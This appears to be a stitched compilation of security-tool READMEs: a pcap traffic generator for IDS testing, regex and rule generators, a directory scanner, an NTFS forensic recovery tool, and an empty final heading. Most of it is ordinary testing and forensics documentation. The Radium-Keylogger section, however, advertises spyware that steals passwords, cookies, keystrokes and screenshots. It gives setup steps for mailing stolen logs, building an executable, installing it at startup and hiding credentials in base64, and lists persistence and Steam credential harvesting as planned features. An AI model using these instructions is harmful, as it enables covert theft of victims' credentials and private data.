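  printf '/ab*c(d|e)f/i\n/foo[0-9]{2}bar/\n' > myre.re
  # Generate 10 streams whose payloads fully match the expressions
  sniffles -c 10 -f myre.re -m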

Command Line Options:
• -a TCP Ack: Send a TCP acknowledgment for every data packet sent. Off by default. Acknowledgement packets carry no data by default.
• -b Bidirectional data: Data will be generated in both directions of a TCP stream. ACKs will be turned on. This feature is off by default.
• -c Count: Number of streams to create. Each stream will contain a minimum of 1 packet. Packets will be between two end-points as defined by the rule or randomly chosen. tcp_handshake, tcp_teardown, and packets_per_stream will increase the number of packets per stream. Currently, data in a stream flows in only one direction unless the -b option is used; Sniffles rules can also designate data to flow in both directions.
• -C Concurrent Flows: Number of flows that will be open at one time. This is best effort: if fewer flows remain than the designated number of concurrent flows, all of the remaining flows are used. For example, if only 1000 flows remain but the number of concurrent flows was set to 10000, only 1000 flows will be written out at that time. The default value is 1000. If used with duration, the -C flows will be maintained throughout the duration, which ultimately disregards any input from -c. The purpose of this option is to create a diverse pcap where packets from the same flow are spread out rather than adjacent, creating the illusion of many concurrent flows. In our tests, we have managed 2-3 million concurrent flows before memory becomes an issue. Note that different latencies among streams can cause some flows to terminate earlier than others.
• -d Rules Directory: Path to a directory containing rule files. Will read every enabled rule in all rule files in the directory. Assumes all rule files end with the extension .rules. Use this option or -f, but not both. The # symbol is used to deactivate (i.e. comment out) a rule.
• -D Duration: Generate based on duration rather than on count. The duration is in seconds. Keep in mind that the default latency between packets is an average of 1-200 microseconds; for low latencies, a long duration could result in millions of packets which could take a long time to build. Duration is also best effort: new streams are not created after the duration is met, but streams that have not completed are still written out, so the actual duration may be longer than designated, though not shorter. Set a larger latency if you wish to have fewer streams created during generation.
• -e Eval: Create just one packet for each rule in the rule set. Ignores all other input except -f. Each packet will have content matching the selected rule.
• -E Full Eval: Create one packet for each viable path in a PCRE rule in the rule set. In other words, ab(c|d)e would create two packets: abce and abde. Ignores all other input except -f.
• -f Rule File: Read a single rule file as per the provided path and file name.
• -F Config: Designate a config file for Sniffles options. The config file is a way of fixing the parameters used for a run of Sniffles.
• -g Timestamp: Set the starting time for the pcap timestamp. This is the number of seconds since 12/31/1969. Default is the current time.
• -h IP Home Prefixes: A list of IP home network prefixes. IP addresses meant to come from an internal address will use these prefixes. Prefixes may designate an entire 4-byte IPv4 address in xxx.xxx format. For example: "10.192.168,172.16".
• -H IPv6 Home Prefixes: Same as IPv4 home prefixes, just for IPv6. Notable exception: the separator is a colon, with two bytes represented between colons.
• -i IPv6 percentage: Set this value between 1 and 100 to generate packets with IPv6. This determines the percentage of streams that will be IPv6.
• -I Intensity of a scan attack (i.e. packets per second).
• -l Content Length: Fix the content length to the designated number of bytes. A value less than one sets the length equal to the content generated by the NFA, or a random number between 10 and 1410 if headers are random too. Will truncate or pad the packet as necessary.
• -L Latency: Average latency in microseconds. If not set, a random average latency between 1 and 200 usecs is determined for each stream. The packets of a given stream will then have that average amount of time between each packet in the flow.
• -m Full match: Fully match rules. By default, generated content will only partially match rules, so alerts should not be generated (though this is not guaranteed).
• -M Allows the use of a MAC distribution to produce custom MAC addresses in the traffic. By default, MAC addresses are randomly generated. More information about the MAC definition file can be found in examples/mac_definition_file.txt. Note: you can specify up to two MAC definition files in order to set different values for source and destination MACs. If you specify only one file, it is used for both directions. Use the notation 'path1:path2' to specify directions: path1 is the MAC definition file for source MACs and path2 for destination MACs. You may also use a question mark (?) to designate one or the other as random, as in '?:path2' for random source MACs while using the file for destination MACs.
• -o Output file: Designate the name of the output file. By default, the file is named sniffles.pcap.
• -O Offset: Offset before starting a scan attack, in seconds; also used when inserting multiple scans into the traffic. If used with -R, this becomes the average number of seconds prior to the start.
• -p Packets-per-stream: Designate the number of content-bearing packets for a single stream. If a positive value x is provided, exactly x content-bearing packets will appear in each stream. If x is negative, a random number of packets (from 1 to abs(x)) will appear in each stream. By default, this value is 1.
• -P Target Port list: For a scan attack. Provide a comma-separated list of possible ports, or a single starting port; otherwise ports will be scanned at random. If a single starting port is provided, ports will be scanned in order from that point to 65535, after which scanning rolls back to the starting point. If a list is provided, the ports in the list will be scanned round-robin.
• -r Random: Generate random content rather than content from the rules. If rules are still provided, they are used in the generation of the headers. Note: many features in the rules may override certain aspects of the random generation.
• -R Random scan attacks: Uses the offset to create scan attacks in the traffic, but treats the offset as a median. The offset determines the amount of time between when one scan finishes and a new scan starts.
• -s Scan Attack: Followed by a comma-separated list of IPv4 addresses indicating what to target. Each IP range will create one scan attack. A range like 192.168.1.1 targets exactly that one IP address, while 192.168.1 targets random IP addresses between 192.168.1.0 and 192.168.1.255.
• -S Scan type: 1 == SYN scan (default), 2 == connection scan.
• -t TCP Handshake: Include a TCP handshake in all TCP streams. Off by default.
• -T TCP Teardown: Include a TCP teardown in all TCP streams. Off by default.
• -v Verbosity: Increase the level of output messages.
• -w Write content: Write the content strings to a file called 'all.re'.
• -W Window: The window, or duration, in seconds of a scan attack.
• -Z Reply Chance: Chance that a scan will receive a reply; in other words, the chance that the target port is open (default 20%).

                      Examples:
                      NOTE: all examples assume you have installed the sniffles package.
To generate a pcap from a single file of regular expressions with 10 streams where every packet matches a rule:
sniffles -c 10 -f myre.re -m
To generate a pcap from a single snort rule file where every packet almost matches a rule:
sniffles -c 10 -f myrules.rules
To generate a pcap from multiple snort rule files in a single directory where every packet matches a rule:
sniffles -c 10 -d myrulesdir -m
                      To generate the same pcap as above, using the same rules, but with random content (Content is random, headers will still follow the rules--does not work with regex or Sniffles rules):
                      sniffles -c 10 -d myrulesdir -r
                      To generate a pcap with 10 streams (1 packet each) and with random data:
                      sniffles -c 10
                      To generate a pcap with 10 streams, each stream with 5 packets, with ACKs and handshake and teardown as well as a fixed length of 50 for the data in each data-bearing packet:
                      sniffles -c 10 -p 5 -l 50 -t -T -a
                      To generate a pcap with 20 random streams with a home network of 192.168.1-2.x:
                      sniffles -c 20 -h 192.168.1,192.168.2
                      To generate a pcap with 20 random streams with a home network of 192.168.x.x for IPv4 and 2001:8888:8888 for IPv6 with 50% of traffic IPv6:
                      sniffles -c 20 -h 192.168.1 -H 2001:8888:8888 -i 50
                      To generate a 5 second packet capture of random packets with an average lapse between packets of 100 microseconds:
                      sniffles -D 5 -L 100
                      To generate a pcap that will create one packet matching each rule in a rule file (or regex file) in sequence:
                      sniffles -f myrules.rules -e
To generate a pcap that creates a packet for every possible branch of a regex, for each regex in a set, and saves the result to a pcap named everything.pcap, use the command below. Note that this function can run in exponential time if the regex contains a large amount of min-max counting, so it may take a long time to run. Further, all options except the two illustrated below are ignored.
                      sniffles -f myrules.rules -o everything.pcap -E
To generate random traffic with a scan attack occurring 2 seconds in and lasting for 2 seconds, with 1000 scan packets per second, an overall capture duration of 5 seconds, a lapse time of 50us, and starting port 80 (sequentially scanning ports from 80):
                      sniffles -D 5 -O 2 -W 2 -I 1000 -L 50 -s 192.168.1.2 -P 80
Similar to above, but creates multiple scan attacks, each with a duration of 1 second and an average offset between attacks of 2 seconds. Further, it only scans the designated ports, and it targets IP addresses in the range 192.168.1.0-255 at random.
                      sniffles -D 8 -O 2 -W 1 -I 10 -L 50 -s 192.168.1 -P 80,8080,8000,8001

                      Sniffles Rule Format:
Sniffles supports several rule formats. First, Sniffles can parse Snort rules and regular expressions (one per line). In addition, Sniffles has its own rule format that can be used to explicitly control traffic. This is done through XML files that describe the traffic. When this format is used, the other Sniffles options may be irrelevant. Example rule files can be found in the examples directory. These rule files are used simply by designating the rule file with the -f option (i.e. sniffles -f rules.xml).
                      The Sniffles rule format is as follows:
                      <?xml version="1.0" encoding="utf-8"?>
                      <petabi_rules>
                      <rule name="test" >
                      <traffic_stream proto="tcp" src="any" dst="any" sport="any"
                      dport="any" handshake="True" teardown="True" synch="True" ip="4">
                      <pkt dir="to server" content="/abc/i" fragment="0" times="1" />
                      <pkt dir="to client" content="/def/i" fragment="0" times="1" />
                      </traffic_stream>
                      <traffic_stream proto="tcp" src="any" dst="any" sport="any"
                      dport="any" handshake="True" teardown="True" synch="True">
                      <pkt dir="to server" content="/abc/i" fragment="0" times="1" />
                      <pkt dir="to client" content="/def/i" fragment="0" times="1" />
                      </traffic_stream>
                      </rule>
                      </petabi_rules>
                      In detail, the tags work as follows:
                      • <petabi_rules> </petabi_rules> : This defines all of the rules for this rules file. There should only be one set of these tags opening and closing all of the designated traffic streams.
• <rule > </rule> : Designates a single rule. A single rule can generate an arbitrary number of traffic streams or packets. A single file may contain any number of rules.
                          • Options:
                            • name: The name for this rule. Mostly for documentation, no real function.
• <traffic_stream> </traffic_stream> : A traffic stream defines traffic between two endpoints. All pkts designated within a single traffic stream will share the same endpoints. Any number of traffic streams can be designated for a given rule. Different traffic streams within the same rule may or may not share endpoints, depending on the settings below.
                            • Options:
• typets: Specify which type of traffic stream to generate. Currently, Standard and ScanAttack are supported.
• scantype: 1 == SYN scan (default), 2 == connection scan. Used with ScanAttack.
                              • target: Specify the target ip address for Scan Attack.
• targetports: For a scan attack. Provide a comma-separated list of possible ports, or a single starting port. Otherwise ports will be scanned at random. If a single starting port is provided, then ports will be scanned in order from that point to 65535, after which the scan will roll back to the starting point. This option is used when typets is 'ScanAttack'.
• srcport: Specify the source port for a scan attack. Random by default.
• duration: The window, or duration, in seconds of a scan attack when typets is 'ScanAttack'.
                              • intensity: Intensity of scan attack if typets is 'ScanAttack'.
                              • offset: Offset before starting a scan attack. Also used when inserting multiple scans into the traffic.
                              • replychance: Chance that a scan will have a reply. In other words, chance the target port is open (default 20%). It is used with ScanAttack.
• proto: Designates the protocol of this traffic stream. Should be TCP, UDP, or ICMP (ICMP is untested).
                              • src: Source IP address. May be an address in xxx.xxx.xxx.xxx format, $EXTERNAL_NET (for an external address--assumes a home network has been designated), $HOME_NET, or any (randomly selects IP address).
                              • dst: Destination IP Address. Same as Source IP Address.
                              • sport: Source port (assumes TCP or UDP). Can use snort port formatting which can be a comma separated list in brackets (i.e. [80,88,89]), a range (i.e. [10:1000]), or any (i.e. random pick from 0-65535).
                              • dport: Destination Port as per sport.
                              • handshake: Will generate a TCP Handshake at the start of the stream. If excluded, there will be no handshake. Valid values are true or false. Default is false.
                              • latency: set the average latency between packets (in microseconds).
                              • teardown: Will close the stream when all traffic has been sent by appending the TCP teardown at the end of the traffic stream. Valid values are true or false. Default is false.
                              • synch: Traffic streams are synchronous or not. When true, one traffic stream must finish prior to the next traffic stream starting. When false, all contiguous streams that are false (i.e. asynchronous) will execute at the same time.
• tcp_overlap: The default value is false. When true, each packet from the second onward has one extra byte of content appended and its TCP sequence number reduced by one, simulating overlapping TCP sequence numbers.
                              • ipv: Designate IPv4 or IPv6. Valid options are 4, or 6. Default is 4.
                              • out_of_order: Randomly have packets arrive out-of-order. Note, this only works with packets that use the 'times' option. Further, this option should also be used with ack so that the proper duplicate acks will appear in the traffic trace. Valid values are true or false. Default is false.
                              • out_of_order_prob: Set the probability that packets will arrive out-of-order. For example, 10 would mean that there is a 10% chance for each packet to arrive out of order. Out-of-order packets arrive after all of the in-order packets. Further, they are randomly mixed as well. Thus, if the first packets 2 and 5 of 10 packets are determined to be out of order, they will arrive last of the 10 packets (slots 9 and 10) and will be in an arbitrary order (i.e. 5 may come before 2 or vice versa). The value for this must be between 1 and 99. Default is 50.
                              • packet_loss: Randomly have packets be dropped (i.e. not arrive). This only works with the 'times' option. Further, this option should also be used with the ack option set to true so that duplicate acks will appear in the traffic trace. Valid values are 1 to 99 representing the chance that a packet will be dropped. Note, the packet drop only happens on data-bearing packets, not on the acks.
                              • ack: Have every data packet in this flow be followed by an ACK from the server. Valid values are true or false. Default is false.
                            • <pkt > </pkt> : This directive designates either an individual packet or a series of packets. The times feature can be used to have one directive generate several packets. Otherwise, it is necessary to explicitly designate each packet in each direction.
                              • Options:
• dir: The direction of the packet. Valid values are 'to server' or 'to client'. The initial src IP is considered the client, and the initial dst IP the server. Thus 'to server' sends a packet from client to server and 'to client' sends a packet from server to client. Default is to server.
                                • content: Regular expression designating the content for this packet. Size of the packet will depend on the regular expression.
• fragment: Whether or not to fragment this packet. Only works with IPv4. Should have a value larger than 2. Will create as many fragments as are valid or as designated (whichever is smaller). Default value is 0, meaning no fragments.
• ack: Send an ack to this packet or not. Valid values are true or false. Default is false.
• split: Split the content among the designated number of packets. By default all content is sent in a single packet (fragments are a small exception to this rule).
• times: Send this packet x times. Default value is 1. A positive value will send exactly x packets (possibly with acks if ack is true), while a negative value will send a random number of packets between 1 and abs(x).
                                • ttl: set time to live value for packet. By default, sniffles will generate random TTL value.
• ttl_expiry: Simulate the TTL expiry attack by breaking a packet into multiple packets with one malicious packet between two good packets. By default, the value is 0 (no malicious packets). If the value is nonzero, a malicious packet is inserted with its TTL set to the ttl_expiry value. If the ttl option is also set, the good packets are given that TTL value.
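Putting several of these options together, the following is a minimal sketch of a rule combining a lossy, out-of-order standard stream with a scan attack. It is assembled from the attributes documented above and has not been validated against the Sniffles parser; all values are illustrative only:
<?xml version="1.0" encoding="utf-8"?>
<petabi_rules>
<rule name="mixed_example" >
<traffic_stream proto="tcp" src="$HOME_NET" dst="$EXTERNAL_NET" sport="any"
dport="[80,8080]" handshake="true" teardown="true" ack="true"
out_of_order="true" out_of_order_prob="25" packet_loss="10">
<pkt dir="to server" content="/get data/i" times="-5" />
<pkt dir="to client" content="/ok/i" times="5" />
</traffic_stream>
<traffic_stream typets="ScanAttack" target="192.168.1.2" targetports="80"
duration="2" intensity="100" offset="1" replychance="30" scantype="1">
</traffic_stream>
</rule>
</petabi_rules>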
Final Notes: The new rule format is just a beginning and may contain problems. Please alert me of any inconsistencies or errors. Further, the intent is to expand the options to provide more and more functionality as needed. Please contact me with desired features. Finally, this product is provided as-is. There is no guarantee of functionality or accuracy. Feel free to branch this project to meet your own needs.

                      Credits:
                      This application has been brought to you by Petabi, Inc. where we make Reliable, Realistic, and Real-fast security solutions.
                      Authors:
                      • Victor C. Valgenti
                      • Min Sik Kim
                      • Tu Le

                      New Features:
                      • 11/21/2014: Version 1.4.0 Added traffic splitting and traffobot for bi-directional traffic generation. Fixed bug where an exception was thrown when the amount of traffic generated could fit in a single traffic write call. Reformatted and enabled usage. Finally, added unit tests for traffobot and XML parsing.
• 02/03/2015: Version 2.0. Completely rewrote how streams work in order to reduce memory requirements when generating large streams using special rules. Currently, it can handle around 2-3 million concurrent flows before things bog down. I have added some features to help when creating large flows. First, generate with something like a concurrency of 2-3 million flows. Also, do not use teardown for these flows. A fraction of the flows will last from the beginning through to the end of the capture while the remainder will be closed out every batch period. I will work on making this more efficient, but managing all of the complex options in Sniffles cannot really be done cheaply in memory. The only other solution is to get a beefier machine with more RAM. This version also contains a variety of fixes.
                      • 02/11/2015: Added probability to out-of-order packets to allow the frequency of out of order packets to be tuned.
                      • 03/05/2015: Changed TCP teardown to standard teardown sequence. Now allow content to be spread across multiple packets without using fragments.
                      • 04/09/2015: Fixed scan traffic, it was partially broken during one of the previous changes. The pcap starting timestamp now defaults to the current time and can be set with the -g option. Finally, the 3rd packet in the 3-way tcp handshake will now be data-bearing if the client is to send data first.
• 05/22/2015: Rewrote rule-parsing to simplify extending the rule parser to accommodate more formats. Embedded NFA traversal and PCRE directly into Sniffles. Cleaned up code and prepared it for the public.
                      • 05/27/2015: Updated documentation, merged in pcre libraries and nfa construction to make sniffles a self-contained package. Added the Regex Generator and the Random Rule Generator as a part of the Sniffles package. Updated version to 3.0.0 and published to github.
                      • 08/12/2015: Implemented a large number of bug fixes and new features. Fundamentally changed how streams and flows are handled to allow for improved extensibility. Added per flow latency. Updated documentation.

                      Regular Expression Generator
This is a simple regular expression generator. It creates regular expressions either completely randomly or based on a series of distributions. The controls that can be placed on how the regular expressions are generated are structural rather than contextual. In other words, there is no effort to make certain string tokens appear in the generated regular expressions. However, the probability distributions can be tweaked to affect the types of features found in the rules, like character classes, alternation, repetition, etc.

                      Install
                      Will be automatically installed with the rest of Sniffles.

                      Options
                      regexgen--Random Regular Expression Generator.
                      usage: regexgen [-C char distribution] [-c number regex]
                      [-D class distribution] [-f output re file]
                      [-l lambda for length generation] [-n negation probability]
                      [-o options chance] [-R repetition chance] [-r repetition distribution]
                      [-t re structural type distribution] [-?] [-g]
• -C Character Distribution: This sets the probability of seeing particular characters or character types. See the brief explanation of distributions below for examples of how to use this. By default this distribution is an equal distribution. This distribution has five slots: ASCII characters, binary characters in \x00 format, alphabetical letters (upper or lower case), digits, and substitution classes (like \w). An example input would be "10,20,10,40,20", meaning any generated character has a 10% chance of being ASCII, 20% binary, 10% letters, 40% digits, and 20% substitution classes. One caveat is that ASCII characters that might cause problems in a regular expression (like '[' or '{') are converted to hex representation (\x3b for example).
                      • -c Number of regular expressions to generate. Default is one.
                      • -D Class Distribution: There are only two slots in the class distribution. The first slot is the probability that the class is comprised of some number of randomly generated characters. The second slot is the probability that the class is comprised of ranges (like a-z).
                      • -f Output file name. This sets the name of the file where the regular expressions are stored. The default is a file named rand.re in the current working directory.
                      • -g Groups: All regular expressions will have a common prefix with at least one or more other regular expressions (as long as there are more than one regex.) A common prefix is just a regular expression that is the same for some set of regular expressions. The total number of possible common prefixes is from 1 to 1/2 the size of the total regular expressions to generate. The default value for this option is false. This option takes no parameters.
• -l Lambda for length: This is the mean length for an exponential distribution of regular expression lengths. The default value is 10.
                      • -n Negation probability: The probability that a character class will be a negation class ([^xyz]) rather than a normal character class ([xyz]). Default probability is 50%.
• -o Option chance: This is the chance for an option to be appended to the regular expression. Current options are 'i', 'm', and 's'. A random number of options are added to the list, with those options chosen through a uniform distribution.
• -R Repetition chance: The chance of repetition occurring after any structural component has been added to the regular expression.
• -r Repetition distribution: The distribution of repetition structures. The slots are: zero to one (?), zero to many (*), one to many (+), and counting ({x,y}).
                      • -t Re structural type distribution: The distribution for the primary structural components of the regular expression. These are comprised of three slots, or categories: characters, classes, and alternation. Note, alternation will simply generate a smaller regular expression up to the size of the remaining length left to the re. In other words, alternation will result in several smaller regular expressions being joined into the overall regular expression. The alternation uses the exact same methodology in creating those smaller regular expressions.
                      • -? Print this help.
This generator will create random regular expressions. It is possible to tune the structures within the regular expressions to a probability distribution, but currently not the content. This is desirable in order to explore the maximum diversity in possible regular expressions (though not necessarily realistic regular expressions). The distributions are handled by creating a list of probabilities for the various possibilities, or slots, for a particular distribution. These are added as command line arguments using a simple string list like: "10,30,40,20". The list should have as many values as it has slots. The total of all values in the list should be 100 and there should not be any fractions. The value at each slot is the probability that that slot will be chosen. For example, the base RE structural type distribution has three slots. The first slot is the probability that the next structure type is a character (where a character can be a letter, digit, binary, ASCII, or substitution class like \w). The second slot is for character classes like [ab@%], [^123], or [a-z]. The final slot is the probability of alternation occurring, like (ab|cd). With these three slots you can tune how often you would like each structure to appear in your regular expressions. For example, regexgen -c 10 -t "80,10,10" would create 10 regular expressions where 80% of the structures used would be characters, 10% would be character classes, and 10% alternation.
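As one more illustration, a hypothetical invocation built from the options above: the following would generate 5 regular expressions drawn mostly from binary characters, with a 25% repetition chance split evenly across the four repetition structures, written to a file named binary.re (the file name is illustrative):
regexgen -c 5 -C "10,60,10,10,10" -R 25 -r "25,25,25,25" -f binary.re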

                      Random Rule Generator
The Random Rule Generator provides a means of creating a number of randomly generated rules with which to test a particular platform. Currently, rules generated meet either the Snort rule format or are just lines of text. In order for the Random Rule Generator to work you must have a set of features defined. Example features can be found in the example_features folder and are further described below.

                      Install
                      Automatically installed with Sniffles
                      Note: The Random Rule Generator makes use of the Random Regex Generator for creating content of any kind.

                      Options
                      Random Rule Generator
                      usage: rulegen -c [number of rules] -f [feature set] -o [outfile] [-s]
                      • -c Number of rules: The number of rules to generate. Default is one.
                      • -f Feature set: The file containing the feature set description. Please see the documentation for further explanation of feature sets and how to describe them.
                      • -o Output file: output file to which rules are written. Default is rules.txt
                      • -s Snort rule format: write rules to a snort rule format. No parameters, defaults to off. When off, rules are just converted to a string format, whatever that may be based on the feature parser.

                      Feature Set
Features are used to describe potential aspects of rules used in an IDS. For example, a packet filter might use rules that target IP source and destination addresses. In that case, it would be possible to create a feature set describing how those IP source and destination addresses should be generated. More specifically, we make the distinction between simple rules and complex rules. The difference between the two is the presence of ambiguous notations. For example, if the notation * means any IP address, then * represents an ambiguous notation. A rule can also use a non-ambiguous notation, like 192.168.1.1, which represents a simple IP address: a single fixed IP address without any ambiguity. We then further define the range of the particular features (i.e. IP addresses across the entire 4 billion plus possible IPv4 addresses, or just some subset of that).
The features ultimately define all of the aspects of an arbitrary rule. Given a feature set and a valid rule format, it becomes possible to randomly generate an arbitrary number of rules that use those features. In this manner, it is possible to generate test rule sets that will examine the IDS across a vector that is often missed.
Features are defined one per line as a semicolon-separated list: type=feature; followed by a list of arguments in key=value pairs, with lists using Python formatting (i.e. [a, ..., z]). Features define specific portions of a target rule format. Features may be extended to add more functionality. Optionally, one can extend the abilities of the features by creating a new rule format.
                      Current Feature Types:
                      1. Feature -- generic feature
                      2. Content -- Content Feature
                      3. IP -- IP Feature
                      4. Protocol -- Protocol Feature
                      Ambiguous lists should be written as lists like [x:y] for a range, [x,y] for a list, {x1,x2,x3} for a set or just * for a wildcard or similar single option.
                      Example about ambiguous list:
                      ambiguity_list=[[2:9]]
it will generate [3:4], [5:6], etc. (any [x:y] such that 2 <= x < y <= 9).

                      ambiguity_list=[[3,20]]
it will generate [3,9,10], [3,4,8,12], etc. (any list [x1,x2,x3,...] such that all values fall between 3 and 20).

                      ambiguity_list=[{5,6,10}]
it will generate a subset of {5,6,10}, such as {5,10} or {5}.

                      ambiguity_list=[[2:9],[3,20],{5,6,11}]
                      it will pick one of [2:9], [3,20], and {5,6,11} and
                      generate a corresponding instance (see above)
                      Example for feature file:
                      type=protocol; name=proto; proto_list=[TCP,UDP,ICMP]; complexity_prob=0;ambiguity_list=None;
                      type=ip; name=sip; version=4; complexity_prob=100;
The above defines two features: a protocol feature and a source IP feature. The protocol feature is named proto, which matters only for the rule formatter, and the valid protocols are TCP, UDP, and ICMP. The IP feature is defined as IPv4 and all rules will be complex. IP complexity is already part of the class and need not be added in the feature definition. This will create IP addresses using CIDR notation.
                      Generic Feature Attributes:
                      • Feature_name: Informational attribute, potentially valuable for the rule formatter.
                      • lower_bound: The lower boundary of possible values. Assumes the feature is a number.
                      • upper_bound: Opposite of lower_bound.
• complexity_prob: The probability of using complex features for a rule. From 0 to 100. Defaults to 0. When complex features are used, an ambiguous notation is randomly selected from the ambiguity list, or, if the feature defines a specific ambiguity (like IP addresses), that is used. When complex features are not used, a value is generated using the boundaries, or, in the case of Content, using a set of distribution values that will restrict the generated string to a series of ASCII characters.
                      • ambiguity_list: A list of possible ambiguous notations. Comma-separated list using python formatting (i.e. [a, b, c]).
                      • toString(): Prints out an instance of a rule given this particular feature set.
                      Content Feature -- Inherits from Feature:
• regex: True or False. If True, will use pcre formatting for the regex and possibly add the options i, s, or m to the regex.
                      • length: Defines the average length of the generated content.
                      • min_regex_length: Defines the minimum length of the regex.
                      Protocol Feature -- Inherits from Feature:
• proto_list: Defines the list of possible protocols, as a comma-separated list (i.e. [TCP, UDP]).
                      IP Feature -- Inherits from Feature:
                      • version: 4 for IP version 4, 6 for IP version 6. Defaults to version 4.
Ambiguous notation for ranges, lists, and sets:
Range notation: [x:y] means from x to y (inclusive).
List notation: [x,y] means a list of some randomly determined number of values, where each value is greater than or equal to x and less than or equal to y.
Set notation: {x1,x2,x3,x4} means a set of values x1, x2, x3, x4. It will generate a subset of the original set.
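As a further illustration, a content feature could be added to the example feature file above. The line below is a sketch built from the attributes documented above; the attribute names follow that list, but the values are illustrative and have not been validated against the parser:
type=content; name=content; regex=True; length=15; min_regex_length=3; complexity_prob=0;
Here regex=True requests pcre-formatted content, length sets the average generated content length, and min_regex_length its minimum, per the attribute descriptions above.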
                      Please look at the example feature sets in the example_features folder for further examples. More details as well as the academic theory behind this are scheduled to be added later.


                      Radium-Keylogger - Python keylogger with multiple features


                      Python keylogger with multiple features.

                      Features
                      • Applications and keystrokes logging
                      • Screenshot logging
                      • Drive tree structure
                      • Logs sending by email
                      • Password Recovery for
                        • Chrome
                        • Mozilla
                        • Filezilla
                        • Core FTP
                        • CyberDuck
                        • FTPNavigator
                        • WinSCP
                        • Outlook
                        • Putty
                        • Skype
                        • Generic Network
                      • Cookie stealer
                      • Keylogger stub update mechanism
                      • Gather system information
                        • Internal and External IP
                        • Ipconfig /all output
                        • Platform

                      Usage
                      • Download the libraries if you are missing any.
• Set the Gmail username and password, and remember to enable "allow connections from less secure apps" in the Gmail settings.
                      • Set the FTP server. Make the folder Radium in which you'll store the new version of exe.
                      • Set the FTP ip, username, password.
• Remember to encode the password in base64 (see the snippet after this list).
                      • Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.
                      • Make the exe using Pyinstaller
                      • Keylogs will be mailed after every 300 key strokes. This can be changed.
                      • Screenshot is taken after every 500 key strokes. This can be changed.
                      • Remember: If you make this into exe, change the variable "originalfilename" and "coppiedfilename" in function copytostartup().
                      • Remember: whatever name you give to "coppiedfilename", should be given to checkfilename in deleteoldstub().
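Since the FTP password must be stored base64-encoded, a quick way to produce the encoded value is a short Python snippet like the following (the password string is a placeholder):
import base64

# Placeholder password; replace with your real FTP password.
encoded = base64.b64encode(b"your_ftp_password")
print(encoded.decode())  # paste this value into the script
# sanity check: base64.b64decode(encoded) == b"your_ftp_password"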

                      Things to work on
• Persistence
                      • Taking screenshots after a specific time. Making it keystrokes independent.
                      • Webcam logging
                      • Skype chat history stealer
• Steam credential harvester



                      OpenDoor - OWASP Directory Access Scanner


This application scans website directories and finds all possible login pages, empty directories, and entry points. Scans are conducted against the dictionary included with this application. This software is written for informational purposes and is an open source product under the GPL license.
Testing of the software on commercial systems and organizations is prohibited!

                      Requirements
                      • Python 2.7.x

                      Install Dependencies
                      sudo pip install -r requirements.txt  

                      Implements
                      • multithreading
                      • filesystem log
                      • detect redirects
                      • random user agent
                      • random proxy from proxy list
                      • verbose mode
                      • subdomains scanner

                      Changelog
                      • v1.0.0 - all the basic functionality is available
                      • v1.0.1 - added debug level as param --debug
                      • v1.2.1 - added filesystem logger (param --log)
                      • v1.2.2 - added example of usage (param --examples)
• v1.3.2 - added possibility to use random proxy from proxy list (param --proxy)
                      • v1.3.3 - simplify dependency installation
                      • v1.3.4 - added code quality watcher
                      • v1.3.5 - added ReadTimeoutError ProxyError handlers
                      • v1.3.51 - fixed code style, resolve file read errors
                      • v1.3.52 - code docstyle added
                      • v2.3.52 - subdomains scan available! (param --check subdomains). Added databases

                      Basic usage
                      python ./opendoor.py --url "http://joomla-ua.org"
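Other documented flags can be combined with the basic scan. For example, a subdomain scan using the proxy list and filesystem log might look like the following (a sketch assembled from the parameters documented below, not a verified invocation):
python ./opendoor.py --url "http://example.com" --check subdomains --proxy --log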

                      Help
                      usage: opendoor.py [-h] [-u URL] [--update] [--examples] [-v] [-c CHECK]
                      [-t THREADS] [-d DELAY] [-r REST] [--debug DEBUG] [-p] [-l]
                      optional arguments:
                      -h, --help show this help message and exit
                      --update Update from version control
                      --examples Examples of usage
                      -v, --version Get current version
-c CHECK, --check CHECK
Directory scan e.g. --check=directories or subdomains
(directories by default)
-t THREADS, --threads THREADS
Allowed threads
-d DELAY, --delay DELAY
Delay between requests
-r REST, --rest REST
Request timeout
--debug DEBUG Debug level (0 by default)
-p, --proxy Use proxy list
-l, --log Use filesystem log
required named arguments:
-u URL, --url URL
URL or page to scan; -u http://example.com


                      RecuperaBit - A Tool For Forensic File System Reconstruction


Software that attempts to reconstruct file system structures and recover files. Currently it supports only NTFS.

                      RecuperaBit attempts reconstruction of the directory structure regardless of:
                      • missing partition table
                      • unknown partition boundaries
                      • partially-overwritten metadata
                      • quick format

                      You can get more information about the reconstruction algorithms and the architecture used in RecuperaBit by reading my MSc thesis or checking out the slides.

                      Usage
                      usage: main.py [-h] [-s SAVEFILE] [-w] [-o OUTPUTDIR] path

                      Reconstruct the directory structure of possibly damaged filesystems.

                      positional arguments:
                      path path to the disk image

                      optional arguments:
                      -h, --help show this help message and exit
                      -s SAVEFILE, --savefile SAVEFILE
                      path of the scan save file
                      -w, --overwrite force overwrite of the save file
                      -o OUTPUTDIR, --outputdir OUTPUTDIR
                      directory for restored contents and output files
                      The main argument is the path to a bitstream image of a disk or partition. RecuperaBit automatically determines the sectors from which partitions start.

RecuperaBit does not modify the disk image; however, it does read some parts of it multiple times throughout execution. It should also work on real devices, such as /dev/sda, but this is not advised.
                      Optionally, a save file can be specified with -s . The first time, after the scanning process, results are saved in the file. After the first run, the file is read to only analyze interesting sectors and speed up the loading phase.

                      Overwriting the save file can be forced with -w .

                      RecuperaBit includes a small command line that allows the user to recover files and export the contents of a partition in CSV or body file format. These are exported in the directory specified by -o (or recuperabit_output ).

                      Pypy
                      RecuperaBit can be run with the standard cPython implementation, however speed can be increased by using it with the Pypy interpreter and JIT compiler:
                      pypy main.py /path/to/disk.img

                      Recovery of File Contents
                      Files can be restored one at a time or recursively, starting from a directory. After the scanning process has completed, you can check the list of partitions that can be recovered by issuing the following command at the prompt:
                      recoverable

                      Each line shows information about a partition. Let's consider the following output example:
                      Partition #0 -> Partition (NTFS, 15.00 MB, 11 files, Recoverable, Offset: 2048, Offset (b): 1048576, Sec/Clus: 8, MFT offset: 2080, MFT mirror offset: 17400)
                      If you want to recover files starting from a specific directory, you can either print the tree on screen with the tree command (very verbose for large drives) or you can export a CSV list of files (see help for details).

If you would rather extract all files from the Root and the Lost Files nodes, you need to know the identifier of the root directory, which depends on the file system type. For the file systems supported by RecuperaBit these are:
File System Type    Root Id
NTFS                5

                      The id for Lost Files is -1 for every file system.

                      Therefore, to restore Partition #0 in our example, you need to run:
                      restore 0 5
                      restore 0 -1
                      The files will be saved inside the output directory specified by -o .

                      Hoper - Trace URL's jumps across the rel links to obtain the last URL


